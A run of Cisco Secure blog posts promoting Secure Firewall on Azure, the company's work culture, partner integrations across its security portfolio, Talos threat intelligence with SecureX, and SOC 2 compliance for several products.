I will also be speaking with Eric Howard, Cisco Secure Technical Marketing Engineer Leader for the Security Platform and Response Group. Eric is a seasoned team leader in both Information Security Sales, and Product Management. He has built and led teams that apply deep technical understanding to business needs, initiatives, and strategies in both start-ups and established companies. 

This is a conversation you do not want to skip! There were a lot of gems shared by these gentlemen that will get you where you need to be as a Security Analyst. 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Scale security on the fly in Microsoft Azure Cloud with Cisco Secure Firewall

By Christopher Consolo

The release of Microsoft Azure Gateway Load Balancer is great news for customers, empowering them to simply and easily add Cisco Secure Firewall capabilities to their Azure cloud infrastructure. By combining Azure Gateway Load Balancer with Cisco Secure Firewall, organizations can quickly scale their firewall presence across their Azure cloud environment, providing protection for infrastructure and applications exactly where and when they need it.

With applications and resources hyper-distributed across hybrid-multicloud environments, organizations require agile security to protect their environment at each control point. This integration empowers organizations to dynamically insert Cisco’s security controls and threat defense capabilities in their Azure environment, removing the clunkiness of provisioning and deploying firewalls, as well as the need to rearchitect the network. Organizations can now enjoy highly available threat defense on the fly, protecting their infrastructure and applications from known and unknown threats.

Securing cloud infrastructure while reducing complexity

Combining Secure Firewall with Azure Gateway Load Balancer offers a significant reduction in operational complexity when securing cloud infrastructure. Azure Gateway Load Balancer provides bump-in-the-wire functionality ensuring Internet traffic to and from an Azure VM, such as an application server, is inspected by Secure Firewall without requiring any routing changes. It also offers a single entry and exit point at the firewall and allows organizations to maintain visibility of the source IP address. Complementing these features, organizations can take advantage of our new Cloud-delivered Firewall Management Center. It enables organizations to manage their firewall presence 100% through the cloud with the same look and feel as they’ve grown accustomed to with Firewall Management Center. With Cloud-delivered Firewall Management Center, organizations will achieve faster time-to-value with simplified firewall deployment and management.

Benefits of Cisco Secure Firewall with Azure Gateway Load Balancer

  • Secure Firewall lowers cloud spend with Azure Autoscale support – Quickly and seamlessly scale virtual firewall instances up and down to meet demand.
  • De-risk projects by removing the need to re-architect – Effortlessly insert Cisco Secure Firewall in existing network architecture without changes, providing win/win outcomes across NetOps, SecOps, DevOps, and application teams.
  • Firewalling where and when you need it – Easily deploy and remove Secure Firewall and its associated security services, including IPS, application visibility and control, malware defense, and URL filtering as needed in the network path.
  • Greater visibility for your applications – Simplify enablement of your intended infrastructure by eliminating the need for source and destination NAT. No additional configuration needed.
  • Health monitoring – Ensure efficient routing with continuous health-checks that monitor your virtual firewall instances via Gateway Load Balancer.
  • Included Cisco Talos® Threat Intelligence – Protect your organization from new and emerging threats with rapid and actionable threat intelligence updated hourly from one of the world’s largest commercial threat intelligence teams, Cisco Talos.

Use-cases

Inbound

Figure 1: Inbound traffic flow to Cisco Secure Firewall with Azure Gateway Load Balancer

 

Figure 2: Inbound traffic flow to a stand-alone server

Outbound

Figure 3: Internal server is behind a public load balancer. Flow is the same as outbound flow for an inbound connection.

 

Figure 4: Outbound flow where the internal server is a stand-alone server.

Azure Gateway Load Balancer support for Cisco Secure Firewall Threat Defense Virtual is available now. To learn more about how Cisco Secure Firewall drives security resilience across your hybrid-multicloud environment, see the additional resources below and reach out to your Cisco sales representative.

Additional Resources

Microsoft Blog: Gateway Load Balancer now generally available in all regions

Azure Marketplace listing: Cisco Secure Firewall Threat Defense Virtual

Cisco Secure Firewall

Cisco Secure Firewall At-a-Glance

Cisco Secure Firewall for Public Cloud

Cloud-delivered Firewall Management Center


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Know Thyself: 10 Ways to Discover Your Work Environment Needs and What It’s Really Like to Work at Cisco

By Mary Kate Schmermund

Self-awareness goes a long way in determining your next professional steps. While job searching, it’s critical to identify how to leverage your transferable skills and network, while also evaluating what environmental factors of work and work culture matter to you most. Learn what it’s like to work at Cisco and the top 10 ways to suss out a workplace that suits your needs from leaders at Cisco Secure, Cisco Talos and Duo Security.

1. Beyond a ping-pong table: Discerning a company’s culture

First things first. Emily Reid, the newly appointed director of employee experience at Cisco Secure who came from Duo Security, advises, “Do your own research to see how the company and their employees describe the culture publicly — on the company’s website and through other sites, articles and resources. For tech companies specifically I always think, “What else do you have beyond the ping-pong table?”’

The interview process is the next key opportunity to find out what culture is like beyond amenities. To gain multiple perspectives, Reid recommends asking about company culture in every interview you have.

The question at the top of Reid’s list: Do you have programs and resources to support the development and success of your employees? “I want to know how a company will be investing in my career growth and if I will feel welcome and included as part of the team. Seeing what a company chooses to center and highlight when describing their culture is usually very telling,” she said.

Interning at a company is another way to get firsthand knowledge and can lead to full-time employment.  “several former interns are now people leaders managing their own teams — and their own interns — coming full circle,” Reid said.

2. Can you bring your whole self to work?

Knowing that there is safety and support in bringing your whole self to work is vital. What policies, programs and initiatives are in place that demonstrate an organization’s commitment to diversity, equity, inclusion and belonging?

Cisco’s ongoing commitments to social justice and pay parity include twelve action steps as part of Cisco’s Social Justice Blueprint. Cultivating a conscious culture includes on-going dialogue, programs and events meant to increase equality. Employee Resource Organizations and mentorship programs provide more opportunities to build community and share knowledge, resources and advocacy.

3. Remote, in person, or hybrid?

What environment allows you to do your best work? Also consider what perks and processes an employer offers to enhance flexibility and adaptability. During the pandemic, Duo and Cisco transitioned  all global events, training and professional development workshops to fully virtual. As in person options resumed following the pandemic, all events are designed to ensure an inclusive experience no matter where you’re joining from.

“We don’t want to go back to a world where people not based in an office feel like they are getting a lesser experience,” Reid said.

Considering how to make programs and information accessible to employees regardless of where they work is also important to Sammi Seaman, team lead of employee experience at Cisco Talos. She’s currently spearheading a new hire program that is “more inclusive of folks whether they’re office based, remote or somewhere across the world.”

4. A work-life balance that works for you

It’s essential to consider how you want your life and work to intersect, particularly as hybrid work becomes more popular. How important is paid time off, flexible work options or a consistent structure?

Cisco Secure offers “Days for Me,” days off for employees to decompress and do something to fill their cups. Monthly “Focus Days” are days without meetings, so employees can prioritize the projects that need attention.

Curran recalls one candidate who, despite multiple offers from competitors, chose Cisco Secure because of the flexible work environment: “This person has a young child and felt that the “Days for Me” and flexibility to work from home in a hybrid situation would work best for his career long-term.”

As Reid’s team helps lead the transition to hybrid work, the book Out of Office: The Big Problem and Bigger Promise of Working From Home by Charlie Warzel and Anne Helen Petersen has been inspiring. The book “does an amazing job of sharing a vision for an inclusive future that empowers employees to be successful and have a ‘work/life balance’ that truly works,” Reid said.

5. Supporting accessibility as the workplace evolves

Currently Cisco Secure offers a hybrid model while many employees still work remotely. In terms of maintaining accessibility through this transition, Marketing Specialist Julie Kramer advocated for more accessibility and saw changes at Cisco as a result.

“Webex pre-COVID didn’t have any closed captioning. So, another deaf person and I reached out and closed captioning and the transcript option got added,” Kramer shared.

Kramer prefers to have high-quality and frequently the same interpreters who “know the terminology for my job, marketing and technology. In business, the security and marketing industry can really talk fast, so you need a high-quality interpreter that can keep up and one that is qualified and certified,” she said.

6. Is a fast-paced environment your speed?

Consider what pace of your specific role and within an industry is needed for you to feel engaged without overwhelmed. While different roles within the same organization and industry may run at different paces, it’s important to tune into what might be expected on your potential new team.

Seaman finds that the fast pace of cybersecurity can be “delightful and challenging. There’s a lot of fast-paced pivoting that happens, which makes for an interesting workplace because two days are never the same,” she said.

7. What structures and opportunities for collaboration motivate you?

Do you prefer a hierarchical structure, or one that is more flat? Are you most effective and fulfilled riding solo, or while consistently connecting with coworkers? Does contributing your ideas make you feel empowered?

At Cisco Secure, there is space to join conversations. “No matter where you sit in the company, you have a voice and can speak up and collaborate and self-organize on a project. It feels like a bunch of really hard working, humble, smart people who are trying to solve problems together,” said Manager of Duo’s Global Knowledge and Communities Team Kelly Davenport.

To enhance communication and knowledge among distributed teams, Seaman started a dialogue series called “The More You Know.” Questions include: What do you do? How do you do it? How can that help other parts of Cisco Talos? The conversations lead to future collaboration and resource sharing.

8. Does teaching and learning energize you?

Do you want to grow professionally and increase your skills and knowledge? A culture of teaching and learning within an organization can help hone and expand your skills and connections.

Lead of Strategic Business Intelligence Ashlee Benge finds the security world “very dynamic. You really can never stop learning. Within Cisco Talos, the people around me are such smart, dedicated people that there’s really a lot that you can gain from just being involved in the group as a whole.”

For Seaman, who didn’t come from a technical background, Cisco Talos offered opportunities to expand her technical knowledge, including from colleagues. “Coming into Cisco Talos, people are like, “Here, let me teach you. You can totally do this. Just because you didn’t know how to do it doesn’t mean you can’t learn. Let’s go,” Seaman shared. Seaman’s colleagues have also learned from her expertise in information and knowledge management given her background as a librarian.

work

More formally, the Learning and Development team recently launched a comprehensive talent development program with enablement resources and support for people leaders. Aspects include: “really thoughtful templates for employees to use with their manager to talk through career goals, development areas, and to define an actionable investment plan. These resources are fueling great career conversations, strong alignment, and thoughtful development plans,” Reid said.

9. Are you driven to evolve through variety and internal mobility?

Do you want to refine your skills within your wheelhouse? Or are you driven to try new tasks and potentially change roles within your next organization?

Benge, whose background is in computational astrophysics, has found her interests shift from technical security research to business strategy and data science. At Cisco Talos, she’s been involved in everything from detection research and threat hunting, to community outreach, conference talks and traveling to support sales engagements. Currently, she’s helping to lead threat hunting in Ukraine.

“My leaders have always made it very clear that if there’s an interest, it’s okay to pursue it and it doesn’t have to necessarily be within the scope of my role. Having that freedom to pursue interests within the industry has been really engaging,” Benge said.

10. Recognize your role in shaping culture

In addition to company values and mission statements, leaders and employees contribute to an organization’s culture every day. If you want to enhance your company’s culture, participate.

“Feedback on what employees want to see is crucial,” Reid said. “The easiest way to contribute to developing culture and a positive employee experience in your workplace is to add to what’s already happening! Culture takes participation and ownership from all employees.”

Reid shared that in performance reviews at Cisco, “‘Team Impact” is equally as important as “Results.” Contributing positively to company culture should contribute to performance reviews and promotion justification,” she said.

Join us

To learn more about Cisco’s company culture and how you can contribute to it, check out our open roles.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

The Case for Multi-Vendor Security Integrations

By Brian Gonsalves

Just like the myriad expanding galaxies seen in the latest images from the James Webb space telescope, the cybersecurity landscape consists of a growing number of security technology vendors, each with the goal of addressing the continually evolving threats faced by customers today. In order to be effective, cybersecurity tools have to be collaborative—be it sharing relevant threat intelligence, device & user insights, acting on detection and remediation workflows, and more.

We at Cisco Secure have embraced this concept for a while now with our continually growing ecosystem of multi-vendor technology integrations. At the RSA Conference 2022 earlier this year, Jeetu Patel, Cisco’s Executive Vice President and General Manager of Security and Collaboration, spoke of how the ‘cybersecurity poverty line’ is widening and how malicious actors are taking advantage of this gaping hole to unleash persistent attacks. It is imperative that cybersecurity vendors interact with and collaborate with each other to lower this gap. To do this, security vendors must adopt open ecosystems of APIs to easily integrate with each other to provide effective ways for mutual customers to defend and react to cybersecurity attacks.

Like in prior years, this fiscal year 2022 saw us growing to include new ecosystem partners and integrations. With 22 new partners and 51 new integrations in our ecosystem, Cisco Secure Technical Alliance (CSTA) now boasts over 450 integrations, including technical integrations with Cisco Duo and Cisco Kenna. This allows our mutual customers the freedom to implement the cybersecurity tools of their choice with the knowledge that these tools can integrate with each other if they need to, thus realizing a better return on investment in their cybersecurity spending and improving cybersecurity posture.

In this annual round-up of our ecosystem, we congratulate our new partners in CSTA and existing partners as well, who have either created new integrations across our portfolio or augmented existing ones. For more details on each partner integration in this announcement, please read through the individual partner highlights below.

Happy integrating!

 


New Cisco Secure Endpoint Integrations

AT&T Cybersecurity

Logo for AT&T Cybersecurity

The AlienApp for Cisco Secure Endpoint enables you to automate threat detection and response activities between USM Anywhere and Cisco Secure Endpoint. It also enhances the threat response capabilities of USM Anywhere by providing orchestration and response actions to isolate or un-isolate hosts based on risks identified in USM Anywhere. In addition, it allows you to collect hourly events from Cisco Secure Endpoint through the USM Anywhere Job Scheduler. Read more here.

AttackIQ

AttackIQ LogoAttackIQ automates the evaluation of Cisco Secure Endpoint against the tactic categories as outlined by MITRE ATT&CK™. The AttackIQ and Cisco partnership and technical integration enables organizations to validate that the Cisco Secure Endpoint is deployed correctly and configured optimally, ensuring protection for your endpoints against the latest threats. Read more here.

Certego

Certego logoWith Certego Tactical Response for Cisco Secure Endpoint, monitored endpoints are monitored by the Certego PanOptikon SOAR platform. When Certego IRT detects malicious activities on a specific host in the customer’s network, it can isolate compromised hosts to block the attack, even without requiring the user to access the Cisco Secure Endpoint Console. Read more about the Certego here.

ServiceNow

ServiceNow logoCisco Secure Endpoint is now certified for the ServiceNow ITSM San Diego release. The Cisco Secure Endpoint App on ServiceNow provides users with the ability to integrate event data from the Cisco Secure Endpoint into ServiceNow by creating ITSM incidents. The app automates the collection of events from Cisco Secure Endpoint and groups them into single incidents. Read more here.

New Cisco Security Connector for iOS Integrations

FAMOC

FAMOC manage from Techstep, a Gartner-recognized MMS provider, is an MDM designed to give IT a complete view and absolute control over mobile devices used by the workforce, so that people can work more effectively and securely. With the Cisco Security Connector for iOS integration, FAMOC MDM extends its enterprise mobility management with an extra layer of network security and traffic analysis tool, giving IT admins tools to make actionable decisions and design access control policies. Read more here.

New Cisco Cloud Security Integrations

Elastic Security

Elastic Security now supports event ingestion from Cisco Umbrella, providing visibility into user activity and attempts to access potentially malicious domains. This new integration supports Umbrella proxy, cloud firewall, IP, and DNS logs. This integration enables security analysts to detect threats and visualize Cisco Umbrella data, and also correlate Umbrella events with other data sources including endpoint, cloud, and network. This integration expands on Elastic’s on-going expansion of Cisco integrations including ASA, Nexus, Meraki, Duo and Secure Firewall Threat Defense. Read more here.

Fortinet

FortiSIEM brings together visibility, correlation, automated response, and remediation in a single, scalable solution. It reduces the complexity of managing network and security operations to effectively free resources, improve breach detection, and even prevent breaches. Read more here.

Hunters

Hunters ingests Cisco Umbrella log and alert information into our SOC Platform; the Platform then correlates that information with all of the other (vendor agnostic) customer security telemetry, including EDR, Identity and Cloud/Network log data, in the customer’s infrastructure to synthesize and detect incidents with a higher fidelity than any single tool alone can produce. Read more here.

LearnSafe

LearnSafe equips school leaders (K-12) with evidence-based information to better understand which students are exhibiting behavioral issues and in need of help based on what they are using, saying, and doing on the school-owned computer. With Cisco Umbrella, LearnSafe administrators are able to block access to domains their students should not be accessing. Read more here.

Microsoft

The Cisco Umbrella solution for Microsoft Azure Sentinel is now live!  This integration enables your customers to ingest Cisco Umbrella events stored in Amazon S3 into Microsoft Sentinel using the Amazon S3 REST API.  Read more here.

Sumo Logic

Sumo Logic’s cloud-native collector supports automatic ingestion of logs from Cisco Umbrella’s hosted AWS S3 buckets. Data collected from Umbrella can then be routed to Sumo’s Cloud SIEM, where it is then automatically normalized and applied to our rule’s engine. Several built-in rules for Umbrella have been created that, when triggered, will generate security signals in the platform. These and other security signals are then clustered together based on related entities (IP, email, domain name, URL, etc.) to create insights for review by the SOC. Read more here.

New Cisco Firepower Next-Gen Firewall Integrations

Alkira

The Secure Firewall team and Alkira have validated Secure Firewall (Virtual) Version 7.1 to run on Alkira’s cloud network as-a-service (CNaaS) platform. The solution offers on-demand hybrid and multi-cloud connectivity, integrated network and security services, end-to-end visibility, controls and governance. Read more here.

Cyware

The Secure Firewall team has validated Cyware’s STIX 1.2 threat intelligence feed for interoperability with Secure Firewall’s Threat Intelligence Director. Customers can quickly operationalize the inbound data to protect the network from the latest threats. Read more here.

Dragos

Dragos protects critical infrastructure and has joined the CSTA program. Dragos inventories assets, determines risk and vulnerabilities and generates firewall policy objects that administrators can apply to their Cisco Secure Firewall deployment through its REST API. Read more here.

Equinix

The Secure Firewall team and Equinix have validated Secure Firewall (Virtual) to run on Equinix’s Network Edge as a Service platform. Equinix Fabric allows you to connect digital infrastructure and services on demand via secure, software-defined interconnection (Ecosystem). Read more here.

Fastvue

Fastvue has joined the CSTA program. The Fastvue Site Clean engine intelligently interprets Cisco Secure Firewall log data so that non-technical employees can easily see what people are actually doing online. The data use to keep companies compliant with workplace and school policies. Read more here.

New Cisco ISE Ecosystem Integrations

Alef Nula

Alef Nula has developed a new integration with ISE. The Alef Nula Identity Bridge consumes identity updates published by pxGrid and serves them to ASA firewalls using the CDA/Radius protocol. Using pxGrid v2.0, it replaces unsupported Cisco CDA and allows ASA firewalls to become an identity consumer of ISE context. It can read the full identity database and can update registered ASA firewalls in Full Download mode. Read more here.

Forescout

Forescout’s pxGrid Plugin integrates with existing Cisco ISE deployments so that you can benefit from Forescout visibility and assessment for policy decisions, while continuing to use ISE as an enforcement point. The pxGrid Plugin enables Forescout platform policies to detect ISE-related properties on endpoints, and to apply Cisco ISE ANC policies, including policies that assign Security Groups to devices. Read more here.

Fortinet

FortiManager provides automation-driven centralized management of Fortinet devices from a single console, enabling full administration and visibility of your network devices through streamlined provisioning and innovative automation tools. FortiManager dynamically collects updates from Cisco ISE with pxGrid and forwards them to FortiGate using the Fortinet Single Sign On (FSSO) protocol. This enables the use of session information collected by Cisco ISE to be leveraged in FortiOS security policies. Read more here.

Radiflow

Radiflow provides OT ICS policy creation and enforcement with the Radiflow iSID IDS. They recently completed a new integration with ISE leveraging pxGrid. With this integration Cisco ISE receives enriched data of OT devices from Radiflow iSID and will process it according to the profiles and policies which have been configured. Enriching ISE with OT specific insights available with iSID’s DPI engine enables better decision making within ISE by providing additional context to categorize devices by their type/function within the OT environment. Read more here.

XTENDISE

XTENDISE is a simple web application connected to Cisco ISE. It is designed for administrators, helpdesk, operators or anyone who needs to work with ISE and helps them with everyday routine tasks related to 802.1X without the need to train them in Cisco ISE. XTENDISE saves administrators’ time, prevents errors and increases network security. Read more here.

New Secure Malware Analytics (Threat Grid) Integrations

Splunk

The Cisco Secure Malware Analytics Add-On for Splunk leverages the Threat Grid API to enrich events within Splunk. The add-on is now updated for Splunk 8 and is available on Splunkbase. Read more here.

New SecureX Threat Response Integrations

Censys

Censys now has an integration with SecureX threat response, which returns Sightings of IP and IPv6 Observables (IOCs) in an investigation. Read more about the Censys relay module here.

Exabeam

The new Exabeam integration empowers users to investigate an observable and determine if it is contained in a log message stored in Exabeam Fusion SIEM Data Lake. It provides users with the date and time the observable was seen in the log, the forwarder that sent the log, and the raw log messages. When you pivot into Exabeam and search for an observable in all the log messages, the results of the search are displayed in the Exabeam UI. This integration allows you to query IPv4, IPv6, SHA-1, SHA-256, MD5, domain, URL, file path, user and email data types and it returns sightings of an observable from each log message. Read more here.

LogRhythm

The LogRhythm integration empowers users to investigate an observable and determine if it is contained in an event stored in LogRhythm. It provides users with the date and time the observable was seen in the event and the raw event data. This integration allows you to query IPv4 and IPv6 data types and it returns sightings of an observable from each event. Read more here.

NetWitness

A proof-of-concept integration with RSA NetWitness SIEM was built for the RSAC SOC and Black Hat NOCs. The SecureX Concrete Relay implementation using NetWitness as a third-party Cyber Threat Intelligence service provider. The Relay itself is just a simple application written in Python that can be easily packaged and deployed. Read more here.

ServiceNow

Cisco SecureX threat response integration with SecOps is now certified for the ServiceNow San Diego release. The module allows ServiceNow SecOps to leverage the Verdicts, Refer and Response capabilities provided by SecureX threat response to assist the security analyst in their investigation workflow. Read more here.

Sumo Logic

The Sumo Logic Cloud SIEM integration provides security analysts with enhanced visibility across the enterprise to thoroughly understand the impact and context of an attack. Streamlined workflows automatically triage alerts to maximize security analyst efficiency and focus. This integration indicates to users that the observable in an investigation is contained in an insight and/or signal within Sumo Logic Cloud SIEM. It allows you to query IPv4, IPv6, SHA-1, SHA-256, MD5, domain, and URL data types. It also returns sightings and indicators of an observable from each insight and signal retrieved from Sumo Logic Cloud SIEM. Read more here.

New SecureX Orchestration Integrations

APIVoid

APIVoid provides JSON APIs useful for cyber threat analysis, threat detection and threat prevention. The following APIVoid atomic actions for SecureX Orchestration Workflows are now available: Get Domain Reputation, Get IP Reputation, Get URL Reputation, Get URL Status. Access the workflows here.

Censys

Censys is a company that allows users to discover the devices, networks, and infrastructure on the Internet and monitor how it changes over time. SecureX orchestration atomic actions for Censys is now available and includes: Basic Search. Access the workflows here.

Cohesity

This integration radically reduces the time and resources enterprises spend to detect, investigate, and remediate ransomware threats to data. It empowers SecOps, ITOps and NetOps with visibility and automation to collaborate in countering ransomware — regardless of whether data resides on-premises or in the cloud — delivering enterprise-wide confidence in deterring, detecting, and recovering fast from cyberattacks. Cohesity’s next-gen data management enhances Cisco SecureX by adding visibility and context to data, complementing Cisco’s existing capabilities for networks, endpoints, clouds, and apps. Read more here.

Farsight Security

SecureX orchestration atomic actions for workflows are now available for Farsight Security DNSDB. They include various items like DKIM key inspections, DNS Resource Records and more. Access the workflows here.

Fortinet

SecureX orchestration workflows for Fortinet FortiGate are now available: Block URL, IP and Domain Threat Containment. Access the workflows here.

Jamf Pro

SecureX orchestration workflows for Jamf Pro include: Lock Computer, Lock Mobile Device. Access the workflows here.

Palo Alto Networks

SecureX orchestration workflows for Palo Alto Networks Panorama are now available: Block URL, IP, Domain Threat Containment. Access the workflows here.

ServiceNow

A new Orchestration action provides top MacOS IR Indicators to ServiceNow This workflow runs multiple Orbital queries on the endpoint provided to look for top incident response indicators of compromise. The results are then posted to a ServiceNow incident. Supported observables: ip, mac_address, amp_computer_guid, hostname. Access the workflow here.

Shodan

Shodan is a database of billions of publicly available IP addresses, and it’s used by security experts to analyze network security. SecureX orchestration atomic actions for Shodan include: Basic Search. Access the workflows here.

New SecureX Device Insights Integrations

Earlier this year we announced SecureX Device Insights which provides comprehensive endpoint inventory in a single unified view. Endpoint searching and reporting allows you to assess device security configuration on employee-owned, contractor-owned, company owned, and IoT/OT devices—without risking business disruption. With Device Insights you can

  • Gain a holistic view of your device data to help you simplify and automate security investigations.
  • Identify gaps in control coverage, build custom policies, and create playbook driven automation options

Device insights supports the following third-party sources in its initial release: Jamf Pro, Microsoft Intune, Ivanti MobileIron and VMware Workspace ONE (formerly AirWatch).

New Cisco Secure Access by Duo Integrations

Bitglass

Bitglass’ Next-Gen CASB provides data protection, threat protection, access management, and visibility, while Duo offers identity verification options like SSO and MFA. The Duo and Bitglass integration provide a synergistic solution that funnels traffic through Duo’s SSO and verifies users via its MFA so Bitglass can deliver real-time data loss prevention and granular adaptive access control. Because of Bitglass’ agentless architecture, the joint solution can secure any app, any device, anywhere. Read more about the integration here. A joint solution brief is also available here.

Cmd

Cmd helps companies authenticate and manage user security in Linux production environments without slowing down teams — you don’t need to individually configure identities and devices. Cmd integrates with Duo to put 2FA checkpoints into Linux-based data centers and cloud infrastructure. The combination of Cmd and Duo enables development teams to run at the modern, agile pace they are accustomed to without any security-induced slowdowns. Read more here.

Darktrace

Darktrace is an AI-native platform that delivers self-learning cyber defense and AI investigations and seamlessly integrates with other tools via an open and extensible architecture. Darktrace’s Security Module for Duo provides coverage over access, user sessions and platform administration within the Duo platform. Read more here.

Dashlane

Dashlane is a password manager that now supports Duo using Duo SSO. The integration lets IT Administrators easily deploy Duo + Dashlane and set up access policies. End users can easily access Dashlane and their passwords with SSO from Duo. Read more here.

HashiCorp

HashiCorp Vault is an identity-based secrets and encryption management system. A secret is anything that you want to tightly control access to, such as API encryption keys, passwords, and certificates. Add another layer of protection and protect access to secrets within HashiCorp Vault with Duo Security MFA. Read more here. A recording of the Cisco Duo + HashiCorp webinar is available to view here.

Oort

Oort discovers vulnerabilities across an entire user population (or a segment of it). Trigger notifications related to behavioral anomalies or best practices, or policies not being followed. Oort integrates with Duo for identity analytics and threat detection to provide a complete picture of the user behavior and highlight any anomalous activity or identify risks. Read more here.

Perimeter 81

Perimeter 81 simplifies cyber and network security for the hybrid workforce, ensuring secure access to local networks, applications, and cloud infrastructure. Their integration with Duo provides protection for administrators and end-users who need to log in to Perimeter 81. Read more here.

Specops Software

Specops Software, a leading provider of password management and authentication solutions, protects businesses by securing user authentication across high-risk tasks including account unlocks and password recovery via self-service or the IT service desk. Organizations can extend Duo authentication to secure user verification across these use cases. Read about the integration here.  A blog on the integration is also available here.

Sectona

Sectona is a Privileged Access Management company that delivers integrated privilege management components for securing dynamic remote workforce access across on-premises or cloud workloads, endpoints, and machine-to-machine communication. Duo’s secure access multi-factor authentication can be used to ensure that each user authenticates using multiple methods (factors) while accessing Sectona Privileged Access Management. Read more here.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cisco Talos — Our not-so-secret threat intel advantage

By Neville Letzerich

Security tools are only as good as the intelligence and expertise that feeds them. We’re very fortunate to have our security technologies powered by Cisco Talos, one of the largest and most trusted threat intelligence groups in the world. Talos is comprised of highly skilled researchers, analysts, and engineers who provide industry-leading visibility, actionable intelligence, and vulnerability research to protect both our customers and the internet at large.

The Talos team serves as a crucial pillar of our innovation — alerting customers and the public to new threats and mitigation tactics, enabling us to quickly incorporate protection into our products, and stepping in to help organizations with incident response, threat hunting, compromise assessments and more. Talos can also be found securing large-scale events such as the Super Bowl, and working with government and law enforcement organizations across the globe to share intelligence.

With Cisco’s vast customer base and broad portfolio — from routers and switches to email and endpoints — Talos has visibility into worldwide telemetry. Once a threat is seen, whether it’s a phishing URL or an IP address hosting malware, detections are created and indicators of compromise are categorized and blocked across our Cisco Secure portfolio.

Talos also leverages its unique insights to help society as a whole better understand and combat the cyberattacks facing us daily. During the war in Ukraine, the group has taken on the additional task of defending over 30 critical infrastructure providers in the country by directly managing and monitoring their endpoint security.

How Talos powers XDR

The reality of security today is that organizations must be constantly ready to detect and contain both known and unknown threats, minimize impact, and keep business going no matter what happens in the cyber realm. In light of hybrid work, evolving network architectures, and increasingly insidious attacks, all organizations must also be prepared to rapidly recover if disaster strikes, and then emerge stronger. We refer to this as security resilience, and Talos plays a critical role in helping our customers achieve it.

For several years, our integrated, cloud-native Cisco SecureX platform has been delivering extended detection and response (XDR) capabilities and more. SecureX allows customers to aggregate, analyze, and act on intelligence from disparate sources for a coordinated response to cyber threats.

Through the SecureX platform, intelligence from Talos is combined with telemetry from our customers’ environments — including many third-party tools — to provide a more complete picture of what’s going on in the network. Additionally, built-in, automated response functionality helps to speed up and streamline mitigation. This way, potential attacks can be identified, prioritized, and remediated before they lead to major impact.

For XDR to be successful, it must not only aggregate data, but also make sense of it. Through combined insights from various resources, SecureX customers obtain the unified visibility and context needed to rapidly prioritize the right threats at the right time. With SecureX, security analysts spend up to 90 percent less time per incident.

Accelerating threat detection and response

One of Australia’s largest universities, Deakin University, needed to improve its outdated security posture and transition from ad hoc processes to a mature program. Its small security team sought an integrated solution to simplify and strengthen threat defense.

With a suite of Cisco security products integrated through SecureX, Deakin University was able to reduce the typical investigation and response time for a major threat down from over a week to just an hour. The university was also able to decrease its response time for malicious emails from an hour to as little as five minutes.

“The most important outcome that we have achieved so far is that security is now a trusted function.”

– Fadi Aljafari, Information Security and Risk Manager, Deakin University

Also in the education space, AzEduNet provides connectivity and online services to 1.5 million students and 150,000 teachers at 4,300 educational institutions in Azerbaijan. “We don’t have enough staff to monitor every entry point into our network and correlate all the information from our security solutions,” says Bahruz Ibrahimov, senior information security engineer at AzEduNet.

The organization therefore implemented Cisco SecureX to accelerate investigations and incident management, maximize operational efficiency with automated workflows, and decrease threat response time. With SecureX, AzEduNet has reduced its security incidents by 80 percent.

“The integration with all our Cisco Secure solutions and with other vendors saves us response and investigation time, as well as saving time for our engineers.”

– Bahruz Ibrahimov, Senior Information Security Engineer, AzEduNet

Boosting cyber resilience with Talos

The sophistication of attackers and sheer number of threats out there today make it extremely challenging for most cybersecurity teams to effectively stay on top of alerts and recognize when something requires their immediate attention. According to a survey by ESG, 81 percent of organizations say their security operations have been affected by the cybersecurity skills shortage.

That’s why Talos employs hundreds of researchers around the globe — and around the clock — to collect and analyze massive amounts of threat data. The group uses the latest in machine learning logic and custom algorithms to distill the data into manageable, actionable intelligence.

“Make no mistake, this is a battle,” said Nick Biasini, head of outreach for Cisco Talos, who oversees a team of global threat hunters. “In order to keep up with the adversaries, you really need a deep technical understanding of how these threats are constructed and how the malware operates to quickly identify how it’s changing and evolving. Offense is easy, defense is hard.”

Maximizing defense against future threats  

Earlier this year, we unveiled our strategic vision for the Cisco Security Cloud to deliver end-to-end security across hybrid, multicloud environments. Talos will continue to play a pivotal role in our technology as we execute on this vision. In addition to driving protection in our products, Talos also offers more customized and hands-on expertise to customers when needed.

Cisco Talos Incident Response provides a full suite of proactive and emergency services to help organizations prepare for, respond to, and recover from a breach — 24 hours a day. Additionally, the recently released Talos Intel on Demand service delivers custom research unique to your organization, as well as direct access to Talos security analysts for increased awareness and confidence.

Enhance your intelligence + security operations

Visit our dedicated Cisco Talos web page to learn more about the group and the resources it offers to help keep global organizations cyber resilient. Then, discover how XDR helps Security Operations Center (SOC) teams hunt for, investigate, and remediate threats.

Watch video: What it means to be a threat hunter


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Announcing SOC 2 Compliance for Cisco Secure Endpoint, Cisco Secure Malware Analytics, and Cisco SecureX

By Farzad Bakhtiar

With a rising number of cyberattacks targeting organizations, protecting sensitive customer information has never been more critical. The stakes are high due to the financial losses, reputational damage, legal & compliance fines, and more that often stem from mishandled data. At Cisco Secure, we recognize this and are continuously looking for ways to improve our information security practices.

As a result, we are excited to announce that we have achieved SOC 2 compliance for the Cisco Secure Endpoint solution, Cisco Malware Analytics, and the Cisco SecureX platform! SOC 2 is a compliance framework developed by the American Institute of Certified Public Accountants (AICPA) that helps ensure organizations responsibly handle customer data. This is done via strong information security practices that adhere to trust service criteria for security, availability, and confidentiality.

Achieving SOC 2 compliance means that we have adhered to these trust principles and gone through a rigorous audit by an independent, third-party firm to validate our information security practices. This shows that we are committed to safeguarding your sensitive data with robust controls in place and gives you the peace of mind that your data is in good hands. We have achieved SOC 2 Type 2 compliance for the following Cisco Secure products:

To learn more about SOC 2 compliance for these solutions, please speak to your Cisco representative, or visit the Cisco Trust Portal, where you can access the SOC 2 reports.

